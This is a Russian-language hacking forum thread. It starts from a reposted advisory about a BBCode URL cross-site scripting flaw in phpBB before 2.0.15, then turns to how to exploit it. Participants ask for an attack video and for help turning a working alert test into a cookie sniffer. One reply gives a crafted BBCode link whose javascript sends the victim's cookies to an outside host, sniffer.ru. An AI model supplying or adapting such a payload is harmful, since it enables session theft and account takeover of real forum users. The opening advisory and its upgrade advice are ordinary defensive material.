http://www.securitylab.ru/55012.html http://www.securitylab.ru/55013.html Межсайтовый скриптинг в при обработке BBCODE URL в phpBB Программа: phpBB версии до 2.0.15 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей. Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: URL производителя: www.phpbb.com Решение: Установите последнюю версию (2.0.15) с сайта производителя.
Так-с... любить Секлаба!! Уже в 2-х местах оставил ссылки... Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?
Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!! вроде как ты и не модератор(админ, урцтой перец ) что бы права качать. а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует. Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех" p.s. вроде я понятно обьяснил...
вроде бы понятно.. но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу. А про авторитет - это уже не твоё дело =)
vo novoe sobitie.davaite sozdaite vidio kak lamanut forum. pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat. ocen bi xotelos posmatret
Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись. Нужно делать конкуренцию!
чтоб посраться можно создать другой топик =) давайте думайте как это использовать =)))))))))))))) ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать
Люди Alert проходит слегка вот только до меня не как не доходит как вместо alertА подставиь снифер с передачей кукисов Помогите плиз...
мда... это как? зависит от форума. как пример: HTML: [url="site.ru"style="background:url(javascript:document.location=sniffer.ru+document.cookie;"]clik me[/url]
шли-шли... выкладывай здесь, блин!) Аттач ещё пока у всех работает)) И давай ссылку где можно скачать!